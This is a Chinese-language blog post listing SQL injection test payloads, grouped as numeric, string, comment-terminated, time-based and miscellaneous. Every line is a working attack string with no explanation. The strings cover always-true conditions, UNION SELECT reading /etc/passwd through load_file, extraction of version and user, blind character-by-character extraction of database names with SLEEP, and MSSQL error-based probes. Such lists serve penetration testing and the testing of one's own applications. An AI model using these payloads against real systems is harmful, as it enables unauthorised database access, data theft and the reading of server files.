ansbius
ansbius

SQL注入测试用例

2017/04/27 SQL

0x00
数字型注入

1
2
3
4
5
6
7
8
9
10
11
'
1+1 3-1
value + 0
1 or 1=1 1) or (1=1
value or 1=2 value) or (1=1
1 and 1=2 1) and (1=2
1 or 'ab'='a'+'b' 1) or ('ab'='a'+'b'
1 or 'ab'='a''b' 1) or ('ab'='a''b'
1 or 'ab'='a'||'b' 1) or ('ab'='a'||'b'
1 and 1=2 UNION SELECT 1,load_file('/etc/passwd'),3,4,5,6,7,8
1 and 1=2 union select 1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 /*

0x01
字符型注入

1
2
3
4
5
6
7
8
'
1' or '1'='1 1') or ('1'='1
value' or '1'='2 value') or ('1'='2
1' and '1'='2 1') and ('1'='2
1' or 'ab'='a'+'b' 1') or ('ab'='a'+'b
1' or 'ab'='a''b 1') or ('ab'='a''b
1' or 'ab'='a'||'b 1') or ('ab'='a'||'b
' or 1=1/*

0x02
终止型注入

1
2
3
4
5
6
7
8
9
admin'-- admin')--
admin'# admin')#
1-- 1)--
1-- 1)--
1 or 1=1-- 1) or 1=1--
'or'1'='1'1-- ') or '1' = '1'--
-1 and 1=2-- -1) and 1=2--
'and '1'='2'-- ') and '1'='2'--
1/*注释*/

0x03
时间

1
2
day=2010-07-22%27%29%3E0+and+1%3D2+or+1%3D2+or+1%3D1+and+datediff%28dd%2C%271111-9-9%27%2C%271111-11-19
day=2010-07-22%27%29%3E0+and+1%3D2+or+1%3D2+or+1%3D2+and+datediff%28dd%2C%271111-9-9%27%2C%271111-11-19

0x04
其他

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
id=1 and (select ascii(mid(user(),1,1))=49)
' and 1=1 and '%25'='
" and 12=12 and "kn"="kn
" and 12=13 and "a"="a
type=creation_date; SELECT SLEEP(5)--
code=(select * from(select(ascii(mid(database()from(1)for(1)))=100 and sleep(5)))x)
code=(select * from(select(ascii(mid(database()from(2)for(1)))=98 and sleep(5)))x)
code=(select * from(select(ascii(mid(database()from(3)for(1)))=52 and sleep(5)))x)
code=(select * from(select(ascii(mid(database()from(4)for(1)))=48 and sleep(5)))x)
orderby=rand(1=1)
orderby=rand(1=2)
0'+AND+(SELECT+*+FROM+(SELECT(SLEEP(8)))a)+AND+'1'%3d'1
7178) AND (SELECT * FROM (SELECT(SLEEP(5)))PVdT) AND (2410=2410.html
+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(70)+CHAR(48)+CHAR(98)+CHAR(48)+CHAR(66)+CHAR(111)+CHAR(82)+CHAR(51)) FROM syscolumns)+
c' AND (SELECT * FROM (SELECT(SLEEP(5)))jDPC) AND 'NvIX'='NvIX
1'and @@version>0--
1 and @@servername>0--
1' and db_name()>0--
< PreviousPost
XSS测试用例
NextPost >
利用drozer进行Android渗透测试
CATALOG